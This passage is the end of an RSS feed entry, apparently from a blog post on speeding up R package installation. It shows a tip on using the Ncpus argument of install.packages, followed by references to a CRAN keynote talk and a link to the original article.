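&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For a one-off installation you can skip the option entirely and pass the argument directly, for example &lt;code&gt;install.packages(&amp;#34;tidyverse&amp;#34;, Ncpus = 2)&lt;/code&gt;.&lt;/p&gt;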
&lt;h3 id="references"&gt;References&lt;/h3&gt;
&lt;p&gt;If you are interested in how CRAN handles the phenomenal number of package submissions, check out this recent talk:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://channel9.msdn.com/Events/useR-international-R-User-conferences/useR-International-R-User-2017-Conference/KEYNOTE-20-years-of-CRAN" rel="external"&gt;Twenty years of CRAN&lt;/a&gt; by Uwe Ligges at useR! 2017 in Brussels.&lt;/li&gt;
&lt;li&gt;Image credit: &lt;a href="https://unsplash.com/photos/-3wygakaeQc" rel="external"&gt;Simson Petrol&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/speeding-up-package-installation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item></channel></rss>